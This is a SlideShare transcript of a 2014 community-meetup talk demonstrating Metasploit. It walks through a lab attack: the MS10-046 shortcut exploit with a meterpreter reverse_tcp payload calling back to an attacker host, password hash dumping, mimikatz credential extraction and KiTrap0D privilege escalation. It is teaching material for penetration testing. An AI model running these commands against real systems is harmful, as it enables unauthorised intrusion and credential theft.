Your SlideShare is downloading. ×
0
Metasploit Demo
Rupam Bhattacharya
Introduction
• It is a free, open source penetration testing
framework started by H. D. Moore in 2003,
which was later acq...
Terminology
Vulnerability: It is a weakness which allows an attacker/pentester to break
into or compromise a system's secu...
Demo
• msfconsole
It provides an "all-in-one" centralized console
and allows you efficient access to virtually all
of the ...
Demo
• use
exploit/windows/browser/ms10_046_shortcut_
icon_dllloader
• Also, used in Stuxnet.
• This module exploits a vul...
Demo
• show options
• set SRVHOST 192.168.56.102
Demo
• set PAYLOAD
windows/meterpreter/reverse_tcp
• Connect back to the attacker, Inject the
meterpreter server DLL via t...
Demo
Demo
• exploit
Demo
Demo
• show sessions
• sessions -i 1
• help
• sysinfo
Demo
• Getuid
• run post/windows/gather/hashdump
• load mimikatz
– wdigest
Demo
• shell
• net user Rupam
This is a local admin. Now we will try to elevate
privileges to get SYSTEM level access.
Demo
• Background
• use exploit/windows/local/ [TAB TAB]
• use exploit/windows/local/ms10_015_kitrap0d
• This module will ...
Demo
• set SESSION 1
• set
PAYLOAD windwos/meterpreter/reverse_tcp
• set LHOST 192.168.56.102
• set LPORT 4443
• show opti...
Demo
Demo
• show sessions
• sessions -i 2
• load mimikatz
– wdigest
Demo
• run post/windows/gather/hashdump
Who am I?
• Rupam Bhattacharya
• Reach me at ru94mb@null.co.in
• Handle: @ru94mb
Upcoming SlideShare
Loading in...5
×

Metasploit Demo

1,508

Published on

null Bangalore Chapter - May 2014 Meet

Published in: Education, Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,508
On Slideshare
0
From Embeds
0
Number of Embeds
5
Actions
Shares
0
Downloads
31
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "Metasploit Demo"

  1. 1. Metasploit Demo Rupam Bhattacharya
  2. 2. Introduction • It is a free, open source penetration testing framework started by H. D. Moore in 2003, which was later acquired by Rapid7. The current stable versions of the framework are written using the Ruby language. It has the world's largest database of tested exploits and receives more than a million downloads every year. It is also one of the most complex projects built in Ruby to date.
  3. 3. Terminology Vulnerability: It is a weakness which allows an attacker/pentester to break into or compromise a system's security. This weakness can either exist in the operating system, application software, or even in the network protocols. Exploit: Exploit is a code which allows an attacker/tester to take advantage of the vulnerable system and compromise its security. Every vulnerability has its own corresponding exploit. Metasploit v4 has more than 1200 exploits. Payload: It is the actual code which does the work. It runs on the system after exploitation. They are mostly used to set up a connection between the attacking and the victim machine. Metasploit v4 has more than 400 payloads. Module: Modules are the small building blocks of a complete system. Every module performs a specific task and a complete system is built by combining several modules to function as a single unit. The biggest advantage of such an architecture is that it becomes easy for developers to integrate a new exploit code and tools into the framework.
  4. 4. Demo • msfconsole It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.
  5. 5. Demo • use exploit/windows/browser/ms10_046_shortcut_ icon_dllloader • Also, used in Stuxnet. • This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path. • CVE-2010-2568
  6. 6. Demo • show options • set SRVHOST 192.168.56.102
  7. 7. Demo • set PAYLOAD windows/meterpreter/reverse_tcp • Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). • set LHOST 192.168.56.102
  8. 8. Demo
  9. 9. Demo • exploit
  10. 10. Demo
  11. 11. Demo • show sessions • sessions -i 1 • help • sysinfo
  12. 12. Demo • Getuid • run post/windows/gather/hashdump • load mimikatz – wdigest
  13. 13. Demo • shell • net user Rupam This is a local admin. Now we will try to elevate privileges to get SYSTEM level access.
  14. 14. Demo • Background • use exploit/windows/local/ [TAB TAB] • use exploit/windows/local/ms10_015_kitrap0d • This module will create a new session with SYSTEM privileges via the KiTrap0D exlpoit by Tavis Ormandy. If the session is use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
  15. 15. Demo • set SESSION 1 • set PAYLOAD windwos/meterpreter/reverse_tcp • set LHOST 192.168.56.102 • set LPORT 4443 • show options • exploit
  16. 16. Demo
  17. 17. Demo • show sessions • sessions -i 2 • load mimikatz – wdigest
  18. 18. Demo • run post/windows/gather/hashdump
  19. 19. Who am I? • Rupam Bhattacharya • Reach me at ru94mb@null.co.in • Handle: @ru94mb
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×